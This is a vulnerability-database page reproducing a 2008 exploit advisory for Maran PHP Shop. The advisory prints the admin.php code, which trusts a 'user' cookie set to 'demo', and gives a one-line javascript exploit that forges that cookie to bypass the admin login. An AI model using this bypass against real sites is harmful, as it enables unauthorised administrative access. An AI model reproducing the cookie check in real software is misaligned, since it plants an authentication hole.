Lucene search
K

maranphpshop-insecure.txt

🗓️ 04 Nov 2008 00:00:00Reported by JosSType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

Maran PHP Shop insecure admin.php cookie handling vulnerability at http://www.maran.pamil-visions.com/maranshop.php. Written for educational purpose

Code
`# Maran PHP Shop (admin.php) Insecure Cookie Handling Vulnerability  
# url: http://www.maran.pamil-visions.com/maranshop.php  
#  
# Author: JosS  
# mail: sys-project[at]hotmail[dot]com  
# site: http://spanish-hackers.com  
# team: Spanish Hackers Team - [SHT]  
#  
# This was written for educational purpose. Use it at your own risk.  
# Author will be not responsible for any damage.  
  
vuln file: /admin.php  
vuln code:  
<?  
$readcookie = $_COOKIE['user'];  
if($readcookie!="demo"){echo "error 467. bad login! <a href='login.php'>login here</a>";exit;}  
//echo $_COOKIE['user'];  
?>  
  
exploit:  
javascript:document.cookie = "user=demo; path=/";  
  
Hack0wn :D  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation